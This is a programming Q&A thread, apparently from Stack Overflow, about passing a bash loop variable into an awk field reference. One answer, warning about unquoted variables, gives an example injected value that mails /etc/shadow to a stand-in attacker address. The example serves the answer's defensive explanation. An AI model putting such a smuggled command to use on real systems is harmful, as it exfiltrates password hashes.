# shell script for awk does not give desired output

Tags: bash, shell, sh

```
#!/bin/bash

index=101,102,103,104,105
/bin/echo "$index" | /bin/awk -F\, '{print $2}'
```

above is my shell script,(this is just a demo It should not be static) when I execute this It returns me value "102" it is right.

```
 #!/bin/bash

index=101,102,103,104,105

for i in 1 2 3 4 5
do
/bin/echo "$index" | /bin/awk -F\, '{print $i}'
done
```

I want to print all numbers one by one...where I am wrong ?

I have made some changes with "null" saprated values...Now what changes I suppose to make?
to get and increment values of $i ?

```
output of  *some command*
1013
1023
12324
13224
3122
2421

#!/bin/bash
index=*some command*
i=1

for LINE in ${OUTPUT} ; do
    ans=$(/bin/echo "$index" | /bin/awk -vRS= -vFS="\n" '{print $i}')
    i=`expr $i + 1`
done
```

Comment: Any particular reason that you're using `/bin/echo` instead of bash's built-in echo command?

Comment: In my server the bash version is 1.14.7(1) so some times it gives me error on finding some command. so for accuracy purpose I am using all command from their binary themselves

Comment: changed '{print $i}'  with "{print \$$i}" and its working

Answer (score -1, accepted):

Use double quotes so `$i` gets expanded by the shell. You have to quote the dollar sign, then, to prevent the expansion of `$$`:

```
awk -F, "{print \$$i}"
```

Comment: You shouldn't expand variables right inside the script, you should pass variables in using awk's `-v` option. While this may work, it's bad practice and you can shoot yourself in the foot if you're not careful.

Answer (score 3):

Single quotes do not allow variable expansion.  So `"$i"` gets expanded to the value of `$i`, but `'$i'` is a literal `$i`.

It's generally unsafe to assume variables will be expanded correctly within a script.  You don't want to put your script in double quotes.  Instead, pass the value of `$i` into the awk script using awk's `-v` option.

```
#!/bin/bash

index=101,102,103,104,105

for i in 1 2 3 4 5; do
  echo "$index" | awk -F, -vi="$i" '{print $i}'
done
```

Since this is an example, and I'm not sure you're *really* going to be using a for loop to generate values of `$i`, you should remember to put double quotes around `$i` so that if it contains spaces or other strange characters, you don't break your script and accidentally execute things you don't want to.  While it's not always necessary, it's *always* recommended to quote your variables in bash.  Caution ≈ good.  If `$i` were to get a value of `"1;mail h4x0r@example.net < /etc/shadow;true"`, you'd be in danger, without quotes.  WITH quotes, you just have a failed script.

Answer (score 1):

You have to pass the value of `i` to awk:

```
#!/bin/bash

index=101,102,103,104,105

for i in 1 2 3 4 5
do
    /bin/echo "$index" | /bin/awk -v i=$i -F\, '{print $i}'
done
```

Otherwise, the value `i` is in the script is not known to awk and by default it takes the value of `0`. So it would print as if you said `$0`.

Answer (score 1):

or like this

```
#!/bin/bash

index=101,102,103,104,105

IFS=','
for x in $index
do
    echo "$x"
done
```

IFS will define the separator in your case ",". Then you can go through the elements (like array)